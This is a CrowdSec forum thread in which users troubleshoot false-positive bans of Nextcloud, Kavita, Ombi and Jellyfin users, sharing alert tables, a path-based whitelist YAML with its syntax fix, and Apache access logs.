False positives occuring with Nextcloud and eBook reader Kavita

1

I have CrowdSec running in front of a Nextcloud instance, and if one of my users attempts to sync files using the Nextcloud desktop client, they will usually get themselves banned. Similar things happen when a user is turning pages in a book on Kavita.

I’m pretty new to CrowdSec, so I’m not sure what information would be helpful here, but here’s the relevant alerts for Nextcloud:

| 455 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:12:16.780727354  |
| 454 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:12:02.230303367  |
| 453 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:05:46.160224937  |
| 452 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:04:16.460203323  |
| 451 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:00:55.198849852  |
| 450 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:58:45.905619787  |
| 449 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:53:49.400745564  |
| 448 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:53:14.750015725  |
| 447 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:51:22.467476162  |
| 446 | Ip:X.X.X.X           | crowdsecurity/http-probing           | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:38:03.256405305  |
| 445 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:38:58.110206824  |
| 444 | Ip:X.X.X.X           | crowdsecurity/http-probing           | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:21:51.721533815  |
| 443 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:21:08.864634398  |

Please let me know if I can provide any other information that would help.

2

Hi there,

Got more or less the same issue.
Installed crowdsec on my Nextcloud server and got banned at my first login attempt.

# cscli decisions list
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+
|  ID   |  SOURCE  |   SCOPE:VALUE   |                REASON                | ACTION | COUNTRY |   AS    | EVENTS |     EXPIRATION     | ALERT ID |
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+
| 43984 | crowdsec | Ip:x.x.x.x| crowdsecurity/http-crawl-non_statics | ban    | FR      |  Orange |     47 | 1h57m54.664254699s |       62 |
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+

Then took a look at the http-crawl-non_statics scenario :

https://hub.crowdsec.net/author/crowdsecurity/configurations/http-crawl-non_statics

Thus, it is just about high rate requests on non static ressources.
Unfortunately, the Nextcloud browser-side code is known to generate a lot of requests (which tends to offer poor user experience).

However, quicly parsed my Apache logs :

cat drive.access.log | cut -d' ' -f8 | cut -d'/' -f-4 | sort | uniq -c
...
    1 /index.php/js/core
      3 /index.php/login
      1 /index.php/svg/activity
      1 /index.php/svg/circles
     43 /index.php/svg/contacts
    187 /index.php/svg/core
      2 /index.php/svg/deck
      8 /index.php/svg/files
...

Hummm, looks that multiple requests to /index.php/svg is the root cause.

Then, took a look at :

https://discourse.crowdsec.net/t/help-with-whitelist-rules-expression-with-portion-of-url/41

but due to some syntax errors with usage of ‘expression’ in the yaml config file, had to adjust based on :

https://github.com/antonmedv/expr/blob/master/docs/Language-Definition.md

So, finally, I ended with creating the following whitelist file :

vi /etc/crowdsec/parsers/s02-enrich/mynextcloudwhitelist.yaml

name: crowdsecurity/mynextcloudwhitelist
description: "Whitelist events from nextcloud legitimate access"
whitelist:
  reason: "ignore index.php/svg"
  expression:
    - evt.Parsed.request contains "'/index.php/svg/'"

Then :

systemctl restart crowdsec

Removed the false-positive decision :

cscli decisions delete --id 43984

Job done (it looks).

Please, consider this as a candidate workaround ; not a perfect fix.

Regards.

3

Hello,

Thanks for looking into it !
If either of you would be able to provide more logs of what is going on, we might be able to come up with an improved whitelist (hopefully).

On the side @caramb, can you tell me more on the issue you faced with :

1 Like
4

Hello Thibault,

Regarding the syntax error issue, the post suggests to use the following :

name: my-custom-whitelist
description: my custom whitelists
whitelist:
  reason: do not ban jellyfin users
  expression:
     - "'/jellyfin' in evt.Parsed.request"

So tried :

name: crowdsecurity/mynextcloudwhitelist
description: "Whitelist events from nextcloud legitimate access"
whitelist:
  reason: "ignore index.php/svg"
  expression:
    - "'/index.php/svg/' in evt.Parsed.request"

But this causes a syntax error :

-- L'unité (unit) crowdsec.service a commencé à démarrer.
nov. 08 13:08:30 nextcloud crowdsec[17901]: time="08-11-2021 13:08:30" level=fatal msg="Unable to compile whitelist expression ''/index.php/svg/' in evt.Parsed.request' : invalid operation: in (mismatched types string and string) (1:19)\
nov. 08 13:08:30 nextcloud systemd[1]: crowdsec.service: Control process exited, code=exited, status=1/FAILURE

This is the reason why I replaced

"'/index.php/svg/' in evt.Parsed.request"

with

evt.Parsed.request contains "'/index.php/svg/'"

Regards.

5

What logs are you looking for? I’m not sure where to find them in the Docker container.

6

It would be the logs of the webservice itself, you might be able to get them directly from docker logs -n XXXX of the container running the nextcloud service.

7

I’m having the same issue, but for file-syncing activity. I have modified the whitelist rule posted here. I am a little concerned about ignoring solely based on the path.
Does anyone know if traefik logs specify that a request sent to Nextcloud is authenticated? If so, what would I add to the whitelist rule to make sure only authenticated users are ignored, or would it be better to ignore successful accesses?

EDIT:
Would something like - evt.Parsed.status matches "2.*" added under expression work?

8

@thibault
I’m also having issues with false positives.
Is there a documentation or guide how to deal with them?
Is it recommended to add the domain paths causing issues to whitelist-file as mentioned here?
How do I submit logs for improving whitelists? Post them here?
Apps I had issues with: Jellyfin and Ombi

9

so here are apache logs of me accessing page /ombi/discover/actor/15140 .
As soon as I have accessed any actors page I will get banned.

xx.xxx.xx.xxx - - [07/Aug/2022:23:02:15 +0200] "GET /ombi/hubs/notification?id=06iztfAE8sxxxxxxCxSKsA&access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWxxxxxxxxxxQWRtaW4iLCJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWxxxxxxxxxxciI6IjQwNjIzMmQ0LWRmZDEtNGZjNS1hNjJmLWQ3MTM0OGMwZjEyMSIsImh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDUvaWRlbnRpdHkvY2xhaW1zL25hbWUiOiJyaWNoQWRtaW4iLCJqdGkiOiI4NWMwYxxxxxxxxxx0LTRhNzYtYjJiNy00MzU5YjFkN2FmMWUiLCJJZCI6IjQwNjIxxxxxxxxxxDEtNGZjNS1hNjJmLWQ3MTM0OGMwZjEyMSIsInJvbGUiOiJBZG1pbiIsImV4cCI6MTY5MTQ0MDc4MCwiaXNzIjoiT21iaSIsImF1ZCI6Ik9tYmkifQ.2b_Kths49NXsrkmKkdA0JCFzm37YKtyqG_RrHd7ka8w HTTP/1.1" 200 1038 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/discover/actor/15140 HTTP/1.1" 200 4814 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/styles.fb4607be8fcaa2ac.css HTTP/1.1" 200 11048 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/Features/ HTTP/1.1" 200 889 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/customization HTTP/1.1" 200 1109 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Identity/accesstoken HTTP/1.1" 200 315 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/translations/en.json?v=398156668 HTTP/1.1" 200 20289 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Identity/ HTTP/1.1" 200 1516 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/issuesenabled HTTP/1.1" 200 285 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "POST /ombi/hubs/notification/negotiate HTTP/1.1" 200 643 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/voteenabled HTTP/1.1" 200 849 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/movie/remaining HTTP/1.1" 200 373 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/music/remaining HTTP/1.1" 200 937 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/tv/remaining HTTP/1.1" 200 373 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/search/actor/15140/movie HTTP/1.1" 200 63865 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/search/actor/15140/tv HTTP/1.1" 200 8748 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/1721 HTTP/1.1" 200 37036 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/10295 HTTP/1.1" 200 38468 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/4391 HTTP/1.1" 200 19304 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/10915 HTTP/1.1" 200 42532 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11175 HTTP/1.1" 200 41049 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11496 HTTP/1.1" 200 38297 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/6399 HTTP/1.1" 200 39833 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11539 HTTP/1.1" 200 36832 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11616 HTTP/1.1" 200 39416 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/6916 HTTP/1.1" 200 41794 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11681 HTTP/1.1" 200 38675 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11689 HTTP/1.1" 200 42020 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/8833 HTTP/1.1" 200 36692 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11829 HTTP/1.1" 200 36787 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9287 HTTP/1.1" 200 40504 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9031 HTTP/1.1" 200 36940 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9394 HTTP/1.1" 200 36838 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/12529 HTTP/1.1" 200 36251 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9474 HTTP/1.1" 200 39978 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/41608 HTTP/1.1" 200 38405 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46436 HTTP/1.1" 200 26679 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/44699 HTTP/1.1" 200 37458 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46446 HTTP/1.1" 200 18043 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46443 HTTP/1.1" 200 35997 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/39807 HTTP/1.1" 200 24578 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11367 HTTP/1.1" 200 37948 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11333 HTTP/1.1" 200 37861 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/52721 HTTP/1.1" 200 37175 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54149 HTTP/1.1" 200 16558 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54166 HTTP/1.1" 200 20540 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54164 HTTP/1.1" 200 37551 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/55093 HTTP/1.1" 200 33558 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/107527 HTTP/1.1" 200 20802 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/269281 HTTP/1.1" 200 19135 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/126813 HTTP/1.1" 200 20019 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/385614 HTTP/1.1" 200 23113 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/328765 HTTP/1.1" 200 16924 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/239211 HTTP/1.1" 200 18673 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/100081 HTTP/1.1" 200 22731 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/271792 HTTP/1.1" 200 19440 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/598050 HTTP/1.1" 200 15569 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11874 HTTP/1.1" 200 36411 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/61937 HTTP/1.1" 200 20827 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/214007 HTTP/1.1" 200 17472 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46568 HTTP/1.1" 200 23463 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/346566 HTTP/1.1" 200 15324 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/25388 HTTP/1.1" 200 39250 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/351746 HTTP/1.1" 200 25430 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/212795 HTTP/1.1" 200 19519 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/251850 HTTP/1.1" 200 16579 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/439853 HTTP/1.1" 200 15381 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/429710 HTTP/1.1" 200 18751 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/206639 HTTP/1.1" 200 22580 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464271 HTTP/1.1" 200 2250 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464267 HTTP/1.1" 200 16151 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464263 HTTP/1.1" 200 19183 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464265 HTTP/1.1" 200 18784 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/731170 HTTP/1.1" 200 16931 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/564191 HTTP/1.1" 200 14743 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/430082 HTTP/1.1" 200 15439 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
